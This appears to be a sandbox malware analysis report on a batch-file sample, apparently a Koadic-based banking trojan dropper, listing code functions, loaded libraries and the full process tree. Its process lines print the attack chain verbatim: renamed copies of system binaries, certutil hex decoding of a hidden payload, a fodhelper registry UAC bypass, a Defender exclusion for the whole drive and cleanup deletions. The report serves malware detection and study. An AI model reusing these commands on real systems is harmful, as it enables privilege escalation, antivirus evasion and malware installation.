        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39989019_2_00007FF73A399890
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39431819_2_00007FF73A394318
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39512819_2_00007FF73A395128
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39405019_2_00007FF73A394050
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A3983D819_2_00007FF73A3983D8
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A396AE819_2_00007FF73A396AE8
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A3967A019_2_00007FF73A3967A0
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A3972C019_2_00007FF73A3972C0
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A396EC819_2_00007FF73A396EC8
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D21EF022_2_00007FF739D21EF0
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2511422_2_00007FF739D25114
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D230B022_2_00007FF739D230B0
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2567C22_2_00007FF739D2567C
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D25B8C22_2_00007FF739D25B8C
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2135822_2_00007FF739D21358
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D23D6022_2_00007FF739D23D60
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D27D5022_2_00007FF739D27D50
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D2792822_2_00007FF739D27928
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029420C431_2_029420C4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0AA5435_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1555435_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F08DF835_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0341035_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1785435_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F137D835_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1422435_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2AA3035_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0D25035_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F09E5035_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F10A6C35_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0E68035_2_00007FF744F0E680
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2EE8835_2_00007FF744F2EE88
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F07D3035_2_00007FF744F07D30
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F27F0035_2_00007FF744F27F00
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F3153835_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F06EE435_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2D9D035_2_00007FF744F2D9D0
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F081D435_2_00007FF744F081D4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0765035_2_00007FF744F07650
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0524035_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F04A3035_2_00007FF744F04A30
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0222035_2_00007FF744F02220
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0CE1035_2_00007FF744F0CE10
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F06BE035_2_00007FF744F06BE0
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2AC4C35_2_00007FF744F2AC4C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F03F9035_2_00007FF744F03F90
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F05B7035_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F118D435_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0B0D835_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0372C35_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0851035_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F09B5035_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F0188435_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F2AFBC35_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F02C4835_2_00007FF744F02C48
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0AA5438_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1555438_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F08DF838_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0341038_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1785438_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F137D838_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1422438_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F2AA3038_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0D25038_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F09E5038_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F10A6C38_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0E68038_2_00007FF744F0E680
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F2EE8838_2_00007FF744F2EE88
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F07D3038_2_00007FF744F07D30
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F27F0038_2_00007FF744F27F00
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F3153838_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F06EE438_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F2D9D038_2_00007FF744F2D9D0
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F081D438_2_00007FF744F081D4
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0765038_2_00007FF744F07650
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0524038_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F04A3038_2_00007FF744F04A30
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0222038_2_00007FF744F02220
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0CE1038_2_00007FF744F0CE10
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F06BE038_2_00007FF744F06BE0
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F2AC4C38_2_00007FF744F2AC4C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F03F9038_2_00007FF744F03F90
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F05B7038_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F118D438_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0B0D838_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0372C38_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0851038_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F09B5038_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F0188438_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F2AFBC38_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F02C4838_2_00007FF744F02C48
        Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF744F1081C appears 45 times
        Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF744F1498C appears 50 times
        Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF744F13448 appears 90 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF607FEEB98 appears 93 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF608017BAC appears 34 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF608017D70 appears 35 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF60805F1B8 appears 183 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF60805F11C appears 37 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6080664A6 appears 173 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF607F5D1C8 appears 41 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF60800ABFC appears 818 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF607F8BC9C appears 280 times
        Source: C:\Users\Public\kn.exeCode function: String function: 00007FF608010D10 appears 181 times
        Source: C:\Users\Public\ger.exeCode function: String function: 00007FF73A39D3D0 appears 56 times
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: String function: 02946640 appears 37 times
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: String function: 029446A4 appears 244 times
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: String function: 02957DF4 appears 45 times
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: String function: 029444AC appears 69 times
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: String function: 02957CA8 appears 49 times
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: String function: 0294480C appears 771 times
        Source: rPO767575.cmd, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
        Source: classification engineClassification label: mal100.bank.troj.expl.evad.winCMD@65/25@6/1
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F032B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF744F032B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,9_2_00007FF60803826C
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A393F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,19_2_00007FF73A393F5C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF744F2FB54
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F989B0 VariantInit,#357,#358,#359,CoCreateInstance,SysAllocString,VariantClear,VariantClear,VariantClear,#357,VariantClear,SysFreeString,9_2_00007FF607F989B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608016320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,9_2_00007FF608016320
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4200:120:WilError_03
        Source: C:\Users\Public\xkn.exeMutant created: NULL
        Source: C:\Users\Public\xkn.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suyjvk0i.1uq.ps1Jump to behavior
        Source: C:\Users\Public\Libraries\Ping_c.pifKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Ping_c.pifKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
        Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: rPO767575.cmdReversingLabs: Detection: 50%
        Source: rPO767575.cmdVirustotal: Detection: 43%
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
        Source: unknownProcess created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Ping_c.pif C:\Users\Public\Libraries\Ping_c.pif
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Ping_c.pif C:\Users\Public\Libraries\Ping_c.pifJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
        Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
